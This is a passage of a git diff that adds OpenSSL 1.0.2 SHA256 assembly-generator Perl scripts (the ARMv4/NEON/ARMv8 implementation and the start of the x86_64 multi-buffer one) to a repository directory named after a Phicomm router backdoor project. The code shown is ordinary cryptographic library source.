+	&add	($E,&DWP(16,"esi"));
+	&add	("edi",&DWP(20,"esi"));
+	&add	("ecx",&DWP(24,"esi"));
+	&mov	(&DWP(16,"esi"),$E);
+	&mov	(&DWP(20,"esi"),"edi");
+	 &mov	(&DWP(20,"esp"),"edi");
+	&mov	("edi",&DWP(28,"esp"));
+	&mov	(&DWP(24,"esi"),"ecx");
+	 #&mov	(&DWP(16,"esp"),$E);
+	&add	("edi",&DWP(28,"esi"));
+	 &mov	(&DWP(24,"esp"),"ecx");
+	&mov	(&DWP(28,"esi"),"edi");
+	 &mov	(&DWP(28,"esp"),"edi");
+	&mov	("edi",&DWP(96+4,"esp"));	# inp
+
+	&vmovdqa	($t3,&QWP(64,$K256));
+	&sub	($K256,3*64);			# rewind K
+	&cmp	("edi",&DWP(96+8,"esp"));	# are we done yet?
+	&jb	(&label("grand_avx_bmi"));
+
+	&mov	("esp",&DWP(96+12,"esp"));	# restore sp
+	&vzeroall	();
+&function_end_A();
+						}
+						}
+						}}}
+&function_end_B("sha256_block_data_order");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha256-armv4.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha256-armv4.pl
new file mode 100644
index 0000000..f14c9c3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha256-armv4.pl
@@ -0,0 +1,661 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# SHA256 block procedure for ARMv4. May 2007.
+
+# Performance is ~2x better than gcc 3.4 generated code and in "abso-
+# lute" terms is ~2250 cycles per 64-byte block or ~35 cycles per
+# byte [on single-issue Xscale PXA250 core].
+
+# July 2010.
+#
+# Rescheduling for dual-issue pipeline resulted in 22% improvement on
+# Cortex A8 core and ~20 cycles per processed byte.
+
+# February 2011.
+#
+# Profiler-assisted and platform-specific optimization resulted in 16%
+# improvement on Cortex A8 core and ~15.4 cycles per processed byte.
+
+# September 2013.
+#
+# Add NEON implementation. On Cortex A8 it was measured to process one
+# byte in 12.5 cycles or 23% faster than integer-only code. Snapdragon
+# S4 does it in 12.5 cycles too, but it's 50% faster than integer-only
+# code (meaning that latter performs sub-optimally, nothing was done
+# about it).
+
+# May 2014.
+#
+# Add ARMv8 code path performing at 2.0 cpb on Apple A7.
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$ctx="r0";	$t0="r0";
+$inp="r1";	$t4="r1";
+$len="r2";	$t1="r2";
+$T1="r3";	$t3="r3";
+$A="r4";
+$B="r5";
+$C="r6";
+$D="r7";
+$E="r8";
+$F="r9";
+$G="r10";
+$H="r11";
+@V=($A,$B,$C,$D,$E,$F,$G,$H);
+$t2="r12";
+$Ktbl="r14";
+
+@Sigma0=( 2,13,22);
+@Sigma1=( 6,11,25);
+@sigma0=( 7,18, 3);
+@sigma1=(17,19,10);
+
+sub BODY_00_15 {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h) = @_;
+
+$code.=<<___ if ($i<16);
+#if __ARM_ARCH__>=7
+	@ ldr	$t1,[$inp],#4			@ $i
+# if $i==15
+	str	$inp,[sp,#17*4]			@ make room for $t4
+# endif
+	eor	$t0,$e,$e,ror#`$Sigma1[1]-$Sigma1[0]`
+	add	$a,$a,$t2			@ h+=Maj(a,b,c) from the past
+	eor	$t0,$t0,$e,ror#`$Sigma1[2]-$Sigma1[0]`	@ Sigma1(e)
+	rev	$t1,$t1
+#else
+	@ ldrb	$t1,[$inp,#3]			@ $i
+	add	$a,$a,$t2			@ h+=Maj(a,b,c) from the past
+	ldrb	$t2,[$inp,#2]
+	ldrb	$t0,[$inp,#1]
+	orr	$t1,$t1,$t2,lsl#8
+	ldrb	$t2,[$inp],#4
+	orr	$t1,$t1,$t0,lsl#16
+# if $i==15
+	str	$inp,[sp,#17*4]			@ make room for $t4
+# endif
+	eor	$t0,$e,$e,ror#`$Sigma1[1]-$Sigma1[0]`
+	orr	$t1,$t1,$t2,lsl#24
+	eor	$t0,$t0,$e,ror#`$Sigma1[2]-$Sigma1[0]`	@ Sigma1(e)
+#endif
+___
+$code.=<<___;
+	ldr	$t2,[$Ktbl],#4			@ *K256++
+	add	$h,$h,$t1			@ h+=X[i]
+	str	$t1,[sp,#`$i%16`*4]
+	eor	$t1,$f,$g
+	add	$h,$h,$t0,ror#$Sigma1[0]	@ h+=Sigma1(e)
+	and	$t1,$t1,$e
+	add	$h,$h,$t2			@ h+=K256[i]
+	eor	$t1,$t1,$g			@ Ch(e,f,g)
+	eor	$t0,$a,$a,ror#`$Sigma0[1]-$Sigma0[0]`
+	add	$h,$h,$t1			@ h+=Ch(e,f,g)
+#if $i==31
+	and	$t2,$t2,#0xff
+	cmp	$t2,#0xf2			@ done?
+#endif
+#if $i<15
+# if __ARM_ARCH__>=7
+	ldr	$t1,[$inp],#4			@ prefetch
+# else
+	ldrb	$t1,[$inp,#3]
+# endif
+	eor	$t2,$a,$b			@ a^b, b^c in next round
+#else
+	ldr	$t1,[sp,#`($i+2)%16`*4]		@ from future BODY_16_xx
+	eor	$t2,$a,$b			@ a^b, b^c in next round
+	ldr	$t4,[sp,#`($i+15)%16`*4]	@ from future BODY_16_xx
+#endif
+	eor	$t0,$t0,$a,ror#`$Sigma0[2]-$Sigma0[0]`	@ Sigma0(a)
+	and	$t3,$t3,$t2			@ (b^c)&=(a^b)
+	add	$d,$d,$h			@ d+=h
+	eor	$t3,$t3,$b			@ Maj(a,b,c)
+	add	$h,$h,$t0,ror#$Sigma0[0]	@ h+=Sigma0(a)
+	@ add	$h,$h,$t3			@ h+=Maj(a,b,c)
+___
+	($t2,$t3)=($t3,$t2);
+}
+
+sub BODY_16_XX {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h) = @_;
+
+$code.=<<___;
+	@ ldr	$t1,[sp,#`($i+1)%16`*4]		@ $i
+	@ ldr	$t4,[sp,#`($i+14)%16`*4]
+	mov	$t0,$t1,ror#$sigma0[0]
+	add	$a,$a,$t2			@ h+=Maj(a,b,c) from the past
+	mov	$t2,$t4,ror#$sigma1[0]
+	eor	$t0,$t0,$t1,ror#$sigma0[1]
+	eor	$t2,$t2,$t4,ror#$sigma1[1]
+	eor	$t0,$t0,$t1,lsr#$sigma0[2]	@ sigma0(X[i+1])
+	ldr	$t1,[sp,#`($i+0)%16`*4]
+	eor	$t2,$t2,$t4,lsr#$sigma1[2]	@ sigma1(X[i+14])
+	ldr	$t4,[sp,#`($i+9)%16`*4]
+
+	add	$t2,$t2,$t0
+	eor	$t0,$e,$e,ror#`$Sigma1[1]-$Sigma1[0]`	@ from BODY_00_15
+	add	$t1,$t1,$t2
+	eor	$t0,$t0,$e,ror#`$Sigma1[2]-$Sigma1[0]`	@ Sigma1(e)
+	add	$t1,$t1,$t4			@ X[i]
+___
+	&BODY_00_15(@_);
+}
+
+$code=<<___;
+#include "arm_arch.h"
+
+.text
+.code	32
+
+.type	K256,%object
+.align	5
+K256:
+.word	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+.word	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+.word	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+.word	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+.word	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+.word	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+.word	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+.word	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+.word	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+.word	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+.word	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+.word	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+.word	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+.word	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+.word	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+.word	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+.size	K256,.-K256
+.word	0				@ terminator
+#if __ARM_MAX_ARCH__>=7
+.LOPENSSL_armcap:
+.word	OPENSSL_armcap_P-sha256_block_data_order
+#endif
+.align	5
+
+.global	sha256_block_data_order
+.type	sha256_block_data_order,%function
+sha256_block_data_order:
+	sub	r3,pc,#8		@ sha256_block_data_order
+	add	$len,$inp,$len,lsl#6	@ len to point at the end of inp
+#if __ARM_MAX_ARCH__>=7
+	ldr	r12,.LOPENSSL_armcap
+	ldr	r12,[r3,r12]		@ OPENSSL_armcap_P
+	tst	r12,#ARMV8_SHA256
+	bne	.LARMv8
+	tst	r12,#ARMV7_NEON
+	bne	.LNEON
+#endif
+	stmdb	sp!,{$ctx,$inp,$len,r4-r11,lr}
+	ldmia	$ctx,{$A,$B,$C,$D,$E,$F,$G,$H}
+	sub	$Ktbl,r3,#256+32	@ K256
+	sub	sp,sp,#16*4		@ alloca(X[16])
+.Loop:
+# if __ARM_ARCH__>=7
+	ldr	$t1,[$inp],#4
+# else
+	ldrb	$t1,[$inp,#3]
+# endif
+	eor	$t3,$B,$C		@ magic
+	eor	$t2,$t2,$t2
+___
+for($i=0;$i<16;$i++)	{ &BODY_00_15($i,@V); unshift(@V,pop(@V)); }
+$code.=".Lrounds_16_xx:\n";
+for (;$i<32;$i++)	{ &BODY_16_XX($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	ldreq	$t3,[sp,#16*4]		@ pull ctx
+	bne	.Lrounds_16_xx
+
+	add	$A,$A,$t2		@ h+=Maj(a,b,c) from the past
+	ldr	$t0,[$t3,#0]
+	ldr	$t1,[$t3,#4]
+	ldr	$t2,[$t3,#8]
+	add	$A,$A,$t0
+	ldr	$t0,[$t3,#12]
+	add	$B,$B,$t1
+	ldr	$t1,[$t3,#16]
+	add	$C,$C,$t2
+	ldr	$t2,[$t3,#20]
+	add	$D,$D,$t0
+	ldr	$t0,[$t3,#24]
+	add	$E,$E,$t1
+	ldr	$t1,[$t3,#28]
+	add	$F,$F,$t2
+	ldr	$inp,[sp,#17*4]		@ pull inp
+	ldr	$t2,[sp,#18*4]		@ pull inp+len
+	add	$G,$G,$t0
+	add	$H,$H,$t1
+	stmia	$t3,{$A,$B,$C,$D,$E,$F,$G,$H}
+	cmp	$inp,$t2
+	sub	$Ktbl,$Ktbl,#256	@ rewind Ktbl
+	bne	.Loop
+
+	add	sp,sp,#`16+3`*4	@ destroy frame
+#if __ARM_ARCH__>=5
+	ldmia	sp!,{r4-r11,pc}
+#else
+	ldmia	sp!,{r4-r11,lr}
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+.size	sha256_block_data_order,.-sha256_block_data_order
+___
+######################################################################
+# NEON stuff
+#
+{{{
+my @X=map("q$_",(0..3));
+my ($T0,$T1,$T2,$T3,$T4,$T5)=("q8","q9","q10","q11","d24","d25");
+my $Xfer=$t4;
+my $j=0;
+
+sub Dlo()   { shift=~m|q([1]?[0-9])|?"d".($1*2):"";     }
+sub Dhi()   { shift=~m|q([1]?[0-9])|?"d".($1*2+1):"";   }
+
+sub AUTOLOAD()          # thunk [simplified] x86-style perlasm
+{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://; $opcode =~ s/_/\./;
+  my $arg = pop;
+    $arg = "#$arg" if ($arg*1 eq $arg);
+    $code .= "\t$opcode\t".join(',',@_,$arg)."\n";
+}
+
+sub Xupdate()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);
+  my ($a,$b,$c,$d,$e,$f,$g,$h);
+
+	&vext_8		($T0,@X[0],@X[1],4);	# X[1..4]
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vext_8		($T1,@X[2],@X[3],4);	# X[9..12]
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vshr_u32	($T2,$T0,$sigma0[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vadd_i32	(@X[0],@X[0],$T1);	# X[0..3] += X[9..12]
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vshr_u32	($T1,$T0,$sigma0[2]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vsli_32	($T2,$T0,32-$sigma0[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vshr_u32	($T3,$T0,$sigma0[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&veor		($T1,$T1,$T2);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vsli_32	($T3,$T0,32-$sigma0[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vshr_u32	($T4,&Dhi(@X[3]),$sigma1[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&veor		($T1,$T1,$T3);		# sigma0(X[1..4])
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vsli_32	($T4,&Dhi(@X[3]),32-$sigma1[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vshr_u32	($T5,&Dhi(@X[3]),$sigma1[2]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vadd_i32	(@X[0],@X[0],$T1);	# X[0..3] += sigma0(X[1..4])
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &veor		($T5,$T5,$T4);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vshr_u32	($T4,&Dhi(@X[3]),$sigma1[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vsli_32	($T4,&Dhi(@X[3]),32-$sigma1[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &veor		($T5,$T5,$T4);		# sigma1(X[14..15])
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vadd_i32	(&Dlo(@X[0]),&Dlo(@X[0]),$T5);# X[0..1] += sigma1(X[14..15])
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vshr_u32	($T4,&Dlo(@X[0]),$sigma1[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vsli_32	($T4,&Dlo(@X[0]),32-$sigma1[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vshr_u32	($T5,&Dlo(@X[0]),$sigma1[2]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &veor		($T5,$T5,$T4);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vshr_u32	($T4,&Dlo(@X[0]),$sigma1[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vld1_32	("{$T0}","[$Ktbl,:128]!");
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vsli_32	($T4,&Dlo(@X[0]),32-$sigma1[1]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &veor		($T5,$T5,$T4);		# sigma1(X[16..17])
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vadd_i32	(&Dhi(@X[0]),&Dhi(@X[0]),$T5);# X[2..3] += sigma1(X[16..17])
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vadd_i32	($T0,$T0,@X[0]);
+	 while($#insns>=2) { eval(shift(@insns)); }
+	&vst1_32	("{$T0}","[$Xfer,:128]!");
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	push(@X,shift(@X));		# "rotate" X[]
+}
+
+sub Xpreload()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);
+  my ($a,$b,$c,$d,$e,$f,$g,$h);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vld1_32	("{$T0}","[$Ktbl,:128]!");
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vrev32_8	(@X[0],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vadd_i32	($T0,$T0,@X[0]);
+	 foreach (@insns) { eval; }	# remaining instructions
+	&vst1_32	("{$T0}","[$Xfer,:128]!");
+
+	push(@X,shift(@X));		# "rotate" X[]
+}
+
+sub body_00_15 () {
+	(
+	'($a,$b,$c,$d,$e,$f,$g,$h)=@V;'.
+	'&add	($h,$h,$t1)',			# h+=X[i]+K[i]
+	'&eor	($t1,$f,$g)',
+	'&eor	($t0,$e,$e,"ror#".($Sigma1[1]-$Sigma1[0]))',
+	'&add	($a,$a,$t2)',			# h+=Maj(a,b,c) from the past
+	'&and	($t1,$t1,$e)',
+	'&eor	($t2,$t0,$e,"ror#".($Sigma1[2]-$Sigma1[0]))',	# Sigma1(e)
+	'&eor	($t0,$a,$a,"ror#".($Sigma0[1]-$Sigma0[0]))',
+	'&eor	($t1,$t1,$g)',			# Ch(e,f,g)
+	'&add	($h,$h,$t2,"ror#$Sigma1[0]")',	# h+=Sigma1(e)
+	'&eor	($t2,$a,$b)',			# a^b, b^c in next round
+	'&eor	($t0,$t0,$a,"ror#".($Sigma0[2]-$Sigma0[0]))',	# Sigma0(a)
+	'&add	($h,$h,$t1)',			# h+=Ch(e,f,g)
+	'&ldr	($t1,sprintf "[sp,#%d]",4*(($j+1)&15))	if (($j&15)!=15);'.
+	'&ldr	($t1,"[$Ktbl]")				if ($j==15);'.
+	'&ldr	($t1,"[sp,#64]")			if ($j==31)',
+	'&and	($t3,$t3,$t2)',			# (b^c)&=(a^b)
+	'&add	($d,$d,$h)',			# d+=h
+	'&add	($h,$h,$t0,"ror#$Sigma0[0]");'.	# h+=Sigma0(a)
+	'&eor	($t3,$t3,$b)',			# Maj(a,b,c)
+	'$j++;	unshift(@V,pop(@V)); ($t2,$t3)=($t3,$t2);'
+	)
+}
+
+$code.=<<___;
+#if __ARM_MAX_ARCH__>=7
+.arch	armv7-a
+.fpu	neon
+
+.type	sha256_block_data_order_neon,%function
+.align	4
+sha256_block_data_order_neon:
+.LNEON:
+	stmdb	sp!,{r4-r12,lr}
+
+	mov	$t2,sp
+	sub	sp,sp,#16*4+16		@ alloca
+	sub	$Ktbl,r3,#256+32	@ K256
+	bic	sp,sp,#15		@ align for 128-bit stores
+
+	vld1.8		{@X[0]},[$inp]!
+	vld1.8		{@X[1]},[$inp]!
+	vld1.8		{@X[2]},[$inp]!
+	vld1.8		{@X[3]},[$inp]!
+	vld1.32		{$T0},[$Ktbl,:128]!
+	vld1.32		{$T1},[$Ktbl,:128]!
+	vld1.32		{$T2},[$Ktbl,:128]!
+	vld1.32		{$T3},[$Ktbl,:128]!
+	vrev32.8	@X[0],@X[0]		@ yes, even on
+	str		$ctx,[sp,#64]
+	vrev32.8	@X[1],@X[1]		@ big-endian
+	str		$inp,[sp,#68]
+	mov		$Xfer,sp
+	vrev32.8	@X[2],@X[2]
+	str		$len,[sp,#72]
+	vrev32.8	@X[3],@X[3]
+	str		$t2,[sp,#76]		@ save original sp
+	vadd.i32	$T0,$T0,@X[0]
+	vadd.i32	$T1,$T1,@X[1]
+	vst1.32		{$T0},[$Xfer,:128]!
+	vadd.i32	$T2,$T2,@X[2]
+	vst1.32		{$T1},[$Xfer,:128]!
+	vadd.i32	$T3,$T3,@X[3]
+	vst1.32		{$T2},[$Xfer,:128]!
+	vst1.32		{$T3},[$Xfer,:128]!
+
+	ldmia		$ctx,{$A-$H}
+	sub		$Xfer,$Xfer,#64
+	ldr		$t1,[sp,#0]
+	eor		$t2,$t2,$t2
+	eor		$t3,$B,$C
+	b		.L_00_48
+
+.align	4
+.L_00_48:
+___
+	&Xupdate(\&body_00_15);
+	&Xupdate(\&body_00_15);
+	&Xupdate(\&body_00_15);
+	&Xupdate(\&body_00_15);
+$code.=<<___;
+	teq	$t1,#0				@ check for K256 terminator
+	ldr	$t1,[sp,#0]
+	sub	$Xfer,$Xfer,#64
+	bne	.L_00_48
+
+	ldr		$inp,[sp,#68]
+	ldr		$t0,[sp,#72]
+	sub		$Ktbl,$Ktbl,#256	@ rewind $Ktbl
+	teq		$inp,$t0
+	subeq		$inp,$inp,#64		@ avoid SEGV
+	vld1.8		{@X[0]},[$inp]!		@ load next input block
+	vld1.8		{@X[1]},[$inp]!
+	vld1.8		{@X[2]},[$inp]!
+	vld1.8		{@X[3]},[$inp]!
+	strne		$inp,[sp,#68]
+	mov		$Xfer,sp
+___
+	&Xpreload(\&body_00_15);
+	&Xpreload(\&body_00_15);
+	&Xpreload(\&body_00_15);
+	&Xpreload(\&body_00_15);
+$code.=<<___;
+	ldr	$t0,[$t1,#0]
+	add	$A,$A,$t2			@ h+=Maj(a,b,c) from the past
+	ldr	$t2,[$t1,#4]
+	ldr	$t3,[$t1,#8]
+	ldr	$t4,[$t1,#12]
+	add	$A,$A,$t0			@ accumulate
+	ldr	$t0,[$t1,#16]
+	add	$B,$B,$t2
+	ldr	$t2,[$t1,#20]
+	add	$C,$C,$t3
+	ldr	$t3,[$t1,#24]
+	add	$D,$D,$t4
+	ldr	$t4,[$t1,#28]
+	add	$E,$E,$t0
+	str	$A,[$t1],#4
+	add	$F,$F,$t2
+	str	$B,[$t1],#4
+	add	$G,$G,$t3
+	str	$C,[$t1],#4
+	add	$H,$H,$t4
+	str	$D,[$t1],#4
+	stmia	$t1,{$E-$H}
+
+	movne	$Xfer,sp
+	ldrne	$t1,[sp,#0]
+	eorne	$t2,$t2,$t2
+	ldreq	sp,[sp,#76]			@ restore original sp
+	eorne	$t3,$B,$C
+	bne	.L_00_48
+
+	ldmia	sp!,{r4-r12,pc}
+.size	sha256_block_data_order_neon,.-sha256_block_data_order_neon
+#endif
+___
+}}}
+######################################################################
+# ARMv8 stuff
+#
+{{{
+my ($ABCD,$EFGH,$abcd)=map("q$_",(0..2));
+my @MSG=map("q$_",(8..11));
+my ($W0,$W1,$ABCD_SAVE,$EFGH_SAVE)=map("q$_",(12..15));
+my $Ktbl="r3";
+
+$code.=<<___;
+#if __ARM_MAX_ARCH__>=7
+.type	sha256_block_data_order_armv8,%function
+.align	5
+sha256_block_data_order_armv8:
+.LARMv8:
+	vld1.32	{$ABCD,$EFGH},[$ctx]
+	sub	$Ktbl,r3,#sha256_block_data_order-K256
+
+.Loop_v8:
+	vld1.8		{@MSG[0]-@MSG[1]},[$inp]!
+	vld1.8		{@MSG[2]-@MSG[3]},[$inp]!
+	vld1.32		{$W0},[$Ktbl]!
+	vrev32.8	@MSG[0],@MSG[0]
+	vrev32.8	@MSG[1],@MSG[1]
+	vrev32.8	@MSG[2],@MSG[2]
+	vrev32.8	@MSG[3],@MSG[3]
+	vmov		$ABCD_SAVE,$ABCD	@ offload
+	vmov		$EFGH_SAVE,$EFGH
+	teq		$inp,$len
+___
+for($i=0;$i<12;$i++) {
+$code.=<<___;
+	vld1.32		{$W1},[$Ktbl]!
+	vadd.i32	$W0,$W0,@MSG[0]
+	sha256su0	@MSG[0],@MSG[1]
+	vmov		$abcd,$ABCD
+	sha256h		$ABCD,$EFGH,$W0
+	sha256h2	$EFGH,$abcd,$W0
+	sha256su1	@MSG[0],@MSG[2],@MSG[3]
+___
+	($W0,$W1)=($W1,$W0);	push(@MSG,shift(@MSG));
+}
+$code.=<<___;
+	vld1.32		{$W1},[$Ktbl]!
+	vadd.i32	$W0,$W0,@MSG[0]
+	vmov		$abcd,$ABCD
+	sha256h		$ABCD,$EFGH,$W0
+	sha256h2	$EFGH,$abcd,$W0
+
+	vld1.32		{$W0},[$Ktbl]!
+	vadd.i32	$W1,$W1,@MSG[1]
+	vmov		$abcd,$ABCD
+	sha256h		$ABCD,$EFGH,$W1
+	sha256h2	$EFGH,$abcd,$W1
+
+	vld1.32		{$W1},[$Ktbl]
+	vadd.i32	$W0,$W0,@MSG[2]
+	sub		$Ktbl,$Ktbl,#256-16	@ rewind
+	vmov		$abcd,$ABCD
+	sha256h		$ABCD,$EFGH,$W0
+	sha256h2	$EFGH,$abcd,$W0
+
+	vadd.i32	$W1,$W1,@MSG[3]
+	vmov		$abcd,$ABCD
+	sha256h		$ABCD,$EFGH,$W1
+	sha256h2	$EFGH,$abcd,$W1
+
+	vadd.i32	$ABCD,$ABCD,$ABCD_SAVE
+	vadd.i32	$EFGH,$EFGH,$EFGH_SAVE
+	bne		.Loop_v8
+
+	vst1.32		{$ABCD,$EFGH},[$ctx]
+
+	ret		@ bx lr
+.size	sha256_block_data_order_armv8,.-sha256_block_data_order_armv8
+#endif
+___
+}}}
+$code.=<<___;
+.asciz  "SHA256 block transform for ARMv4/NEON/ARMv8, CRYPTOGAMS by <appro\@openssl.org>"
+.align	2
+#if __ARM_MAX_ARCH__>=7
+.comm   OPENSSL_armcap_P,4,4
+#endif
+___
+
+{   my  %opcode = (
+	"sha256h"	=> 0xf3000c40,	"sha256h2"	=> 0xf3100c40,
+	"sha256su0"	=> 0xf3ba03c0,	"sha256su1"	=> 0xf3200c40	);
+
+    sub unsha256 {
+	my ($mnemonic,$arg)=@_;
+
+	if ($arg =~ m/q([0-9]+)(?:,\s*q([0-9]+))?,\s*q([0-9]+)/o) {
+	    my $word = $opcode{$mnemonic}|(($1&7)<<13)|(($1&8)<<19)
+					 |(($2&7)<<17)|(($2&8)<<4)
+					 |(($3&7)<<1) |(($3&8)<<2);
+	    # since ARMv7 instructions are always encoded little-endian.
+	    # correct solution is to use .inst directive, but older
+	    # assemblers don't implement it:-(
+	    sprintf ".byte\t0x%02x,0x%02x,0x%02x,0x%02x\t@ %s %s",
+			$word&0xff,($word>>8)&0xff,
+			($word>>16)&0xff,($word>>24)&0xff,
+			$mnemonic,$arg;
+	}
+    }
+}
+
+foreach (split($/,$code)) {
+
+	s/\`([^\`]*)\`/eval $1/geo;
+
+	s/\b(sha256\w+)\s+(q.*)/unsha256($1,$2)/geo;
+
+	s/\bret\b/bx	lr/go		or
+	s/\bbx\s+lr\b/.word\t0xe12fff1e/go;	# make it possible to compile with -march=armv4
+
+	print $_,"\n";
+}
+
+close STDOUT; # enforce flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha256-mb-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha256-mb-x86_64.pl
new file mode 100644
index 0000000..adf2ddc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha256-mb-x86_64.pl
@@ -0,0 +1,1560 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# Multi-buffer SHA256 procedure processes n buffers in parallel by
+# placing buffer data to designated lane of SIMD register. n is
+# naturally limited to 4 on pre-AVX2 processors and to 8 on
+# AVX2-capable processors such as Haswell.
+#
+#		this	+aesni(i)	sha256	aesni-sha256	gain(iv)
+# -------------------------------------------------------------------
+# Westmere(ii)	23.3/n	+1.28=7.11(n=4)	12.3	+3.75=16.1	+126%
+# Atom(ii)	38.7/n	+3.93=13.6(n=4)	20.8	+5.69=26.5	+95%
+# Sandy Bridge	(20.5	+5.15=25.7)/n	11.6	13.0		+103%
+# Ivy Bridge	(20.4	+5.14=25.5)/n	10.3	11.6		+82%
+# Haswell(iii)	(21.0	+5.00=26.0)/n	7.80	8.79		+170%
+# Bulldozer	(21.6	+5.76=27.4)/n	13.6	13.7		+100%
+#
+# (i)	multi-block CBC encrypt with 128-bit key;
+# (ii)	(HASH+AES)/n does not apply to Westmere for n>3 and Atom,
+#	because of lower AES-NI instruction throughput, nor is there
+#	AES-NI-SHA256 stitch for these processors;
+# (iii)	"this" is for n=8, when we gather twice as much data, result
+#	for n=4 is 20.3+4.44=24.7;
+# (iv)	presented improvement coefficients are asymptotic limits and
+#	in real-life application are somewhat lower, e.g. for 2KB 
+#	fragments they range from 75% to 130% (on Haswell);
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+$avx=0;
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+}
+
+if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	   `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+}
+
+if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	   `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
